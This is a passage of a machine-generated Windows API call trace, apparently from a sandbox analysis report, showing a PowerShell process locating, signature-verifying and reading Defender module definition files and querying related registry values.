lpOldMode=0x1b62c978) returned 1 [0339.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0339.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0339.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0339.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0339.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c888) returned 1 [0339.311] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62cbb0 | out: lpFileInformation=0x1b62cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2da5757f, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3ce6)) returned 1 [0339.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c838) returned 1 [0339.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0339.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0339.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca88) returned 1 [0339.312] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7cc [0339.312] GetFileType (hFile=0x7cc) returned 0x1 [0339.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0339.312] GetFileType (hFile=0x7cc) returned 0x1 [0339.313] WTGetSignatureInfo () returned 0x0 [0339.346] CertDuplicateCertificateContext (pCertContext=0x1b6620f0) returned 0x1b6620f0 [0339.346] CryptCATHandleFromStore () returned 0x6f9990 [0339.346] WTHelperGetProvSignerFromChain () returned 0x6fd410 [0339.346] WTHelperGetProvCertFromChain () returned 0x6fc320 [0339.347] CertDuplicateCertificateContext (pCertContext=0x1b662270) returned 0x1b662270 [0339.347] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62caf8 | out: phkResult=0x1b62caf8*=0x7d4) returned 0x0 [0339.348] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x0, lpcbData=0x1b62cb40*=0x0 | out: lpType=0x1b62cb48*=0x1, lpData=0x0, lpcbData=0x1b62cb40*=0x56) returned 0x0 [0339.348] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x26670e0, lpcbData=0x1b62cb40*=0x56 | out: lpType=0x1b62cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b62cb40*=0x56) returned 0x0 [0339.348] RegCloseKey (hKey=0x7d4) returned 0x0 [0339.348] CoTaskMemAlloc (cb=0x10) returned 0x1a8a8230 [0339.348] CoTaskMemAlloc (cb=0x50) returned 0x1a89ac20 [0339.348] WinVerifyTrust () returned 0x0 [0339.349] CoTaskMemFree (pv=0x1a89ac20) [0339.349] CoTaskMemFree (pv=0x1a8a8230) [0339.349] CertFreeCertificateContext (pCertContext=0x1b6620f0) returned 1 [0339.349] CloseHandle (hObject=0x7cc) returned 1 [0339.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0339.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0339.349] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62cd48) returned 1 [0339.350] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7cc [0339.350] GetFileType (hFile=0x7cc) returned 0x1 [0339.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62ccb8) returned 1 [0339.350] GetFileType (hFile=0x7cc) returned 0x1 [0339.351] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x0 [0339.351] ReadFile (in: hFile=0x7cc, lpBuffer=0x2668218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2668218*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.351] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x1000 [0339.351] ReadFile (in: hFile=0x7cc, lpBuffer=0x2668218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2668218*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.352] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x2000 [0339.352] ReadFile (in: hFile=0x7cc, lpBuffer=0x2668218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2668218*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.352] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3000 [0339.352] ReadFile (in: hFile=0x7cc, lpBuffer=0x2668218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2668218*, lpNumberOfBytesRead=0x1b62cd58*=0xce6, lpOverlapped=0x0) returned 1 [0339.352] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3ce6 [0339.352] ReadFile (in: hFile=0x7cc, lpBuffer=0x266764e, nNumberOfBytesToRead=0x31a, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x266764e*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0339.353] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3ce6 [0339.353] ReadFile (in: hFile=0x7cc, lpBuffer=0x2668218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2668218*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0339.353] CoTaskMemAlloc (cb=0x20c) returned 0x1b647830 [0339.353] GetSystemDirectoryW (in: lpBuffer=0x1b647830, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0339.353] CoTaskMemFree (pv=0x1b647830) [0339.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0339.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0339.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca18) returned 1 [0339.354] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd40 | out: lpFileInformation=0x1b62cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0339.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9c8) returned 1 [0339.354] GetSystemInfo (in: lpSystemInfo=0x1b62cdc0 | out: lpSystemInfo=0x1b62cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0339.354] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62ccc8 | out: phkResult=0x1b62ccc8*=0x7d0) returned 0x0 [0339.355] RegQueryValueExW (in: hKey=0x7d0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62cd18, lpData=0x0, lpcbData=0x1b62cd10*=0x0 | out: lpType=0x1b62cd18*=0x0, lpData=0x0, lpcbData=0x1b62cd10*=0x0) returned 0x2 [0339.355] RegCloseKey (hKey=0x7d0) returned 0x0 [0339.356] CloseHandle (hObject=0x7cc) returned 1 [0339.359] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0339.359] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0339.359] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0339.359] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0339.359] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0339.359] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0339.429] CoCreateGuid (in: pguid=0x1b62ce58 | out: pguid=0x1b62ce58*(Data1=0x29df9a8b, Data2=0xa57a, Data3=0x4594, Data4=([0]=0x92, [1]=0xd, [2]=0xf3, [3]=0x35, [4]=0x2f, [5]=0x0, [6]=0xe9, [7]=0xdb))) returned 0x0 [0339.433] AmsiScanBuffer () returned 0x80070015 [0339.440] EtwEventWriteTransfer () returned 0x0 [0339.441] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.441] EtwEventActivityIdControl () returned 0x0 [0339.441] EtwEventActivityIdControl () returned 0x0 [0339.442] EtwEventActivityIdControl () returned 0x0 [0339.442] EtwEventActivityIdControl () returned 0x0 [0339.442] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.443] EtwEventActivityIdControl () returned 0x0 [0339.443] EtwEventActivityIdControl () returned 0x0 [0339.443] EtwEventActivityIdControl () returned 0x0 [0339.443] EtwEventActivityIdControl () returned 0x0 [0339.443] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0x1f6db1a2, Data2=0xeb86, Data3=0x4b14, Data4=([0]=0x8c, [1]=0x47, [2]=0xdb, [3]=0xf5, [4]=0x92, [5]=0x1d, [6]=0x7d, [7]=0xb1))) returned 0x0 [0339.443] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0xd2feefe5, Data2=0x72e2, Data3=0x449c, Data4=([0]=0x83, [1]=0x71, [2]=0x36, [3]=0xb4, [4]=0xc0, [5]=0xb6, [6]=0x41, [7]=0xf8))) returned 0x0 [0339.444] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.444] EtwEventActivityIdControl () returned 0x0 [0339.444] EtwEventActivityIdControl () returned 0x0 [0339.444] EtwEventActivityIdControl () returned 0x0 [0339.445] EtwEventActivityIdControl () returned 0x0 [0339.445] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml")) returned 0x20 [0339.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0339.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0339.446] CoTaskMemAlloc (cb=0x20c) returned 0x1b64a2b0 [0339.446] GetSystemDirectoryW (in: lpBuffer=0x1b64a2b0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0339.446] CoTaskMemFree (pv=0x1b64a2b0) [0339.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0339.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0339.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9f8) returned 1 [0339.446] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd20 | out: lpFileInformation=0x1b62cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0339.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9a8) returned 1 [0339.447] GetSystemInfo (in: lpSystemInfo=0x1b62cda0 | out: lpSystemInfo=0x1b62cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0339.447] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62cca8 | out: phkResult=0x1b62cca8*=0x7cc) returned 0x0 [0339.447] RegQueryValueExW (in: hKey=0x7cc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62ccf8, lpData=0x0, lpcbData=0x1b62ccf0*=0x0 | out: lpType=0x1b62ccf8*=0x0, lpData=0x0, lpcbData=0x1b62ccf0*=0x0) returned 0x2 [0339.447] RegCloseKey (hKey=0x7cc) returned 0x0 [0339.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0339.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0339.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca48) returned 1 [0339.448] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x2714d88 | out: lpFileInformation=0x2714d88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2de5d47a, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3cd2)) returned 1 [0339.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0339.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0339.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0339.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9c8) returned 1 [0339.448] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62ccf0 | out: lpFileInformation=0x1b62ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2de5d47a, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3cd2)) returned 1 [0339.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c978) returned 1 [0339.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0339.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0339.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0339.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0339.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c888) returned 1 [0339.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62cbb0 | out: lpFileInformation=0x1b62cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2de5d47a, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3cd2)) returned 1 [0339.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c838) returned 1 [0339.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0339.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0339.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca88) returned 1 [0339.449] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7cc [0339.450] GetFileType (hFile=0x7cc) returned 0x1 [0339.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0339.450] GetFileType (hFile=0x7cc) returned 0x1 [0339.450] WTGetSignatureInfo () returned 0x0 [0339.476] CertDuplicateCertificateContext (pCertContext=0x1b6626f0) returned 0x1b6626f0 [0339.476] CryptCATHandleFromStore () returned 0x6f9990 [0339.476] WTHelperGetProvSignerFromChain () returned 0x6fd410 [0339.476] WTHelperGetProvCertFromChain () returned 0x6fc540 [0339.477] CertDuplicateCertificateContext (pCertContext=0x1b663af0) returned 0x1b663af0 [0339.477] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62caf8 | out: phkResult=0x1b62caf8*=0x7d4) returned 0x0 [0339.478] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x0, lpcbData=0x1b62cb40*=0x0 | out: lpType=0x1b62cb48*=0x1, lpData=0x0, lpcbData=0x1b62cb40*=0x56) returned 0x0 [0339.478] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x2715608, lpcbData=0x1b62cb40*=0x56 | out: lpType=0x1b62cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b62cb40*=0x56) returned 0x0 [0339.478] RegCloseKey (hKey=0x7d4) returned 0x0 [0339.478] CoTaskMemAlloc (cb=0x10) returned 0x1a8a7f30 [0339.478] CoTaskMemAlloc (cb=0x50) returned 0x1a899780 [0339.478] WinVerifyTrust () returned 0x0 [0339.478] CoTaskMemFree (pv=0x1a899780) [0339.478] CoTaskMemFree (pv=0x1a8a7f30) [0339.478] CertFreeCertificateContext (pCertContext=0x1b6626f0) returned 1 [0339.479] CloseHandle (hObject=0x7cc) returned 1 [0339.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0339.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0339.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62cd48) returned 1 [0339.479] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7cc [0339.479] GetFileType (hFile=0x7cc) returned 0x1 [0339.479] SetThreadErrorMode (dwNewMode=0x0, 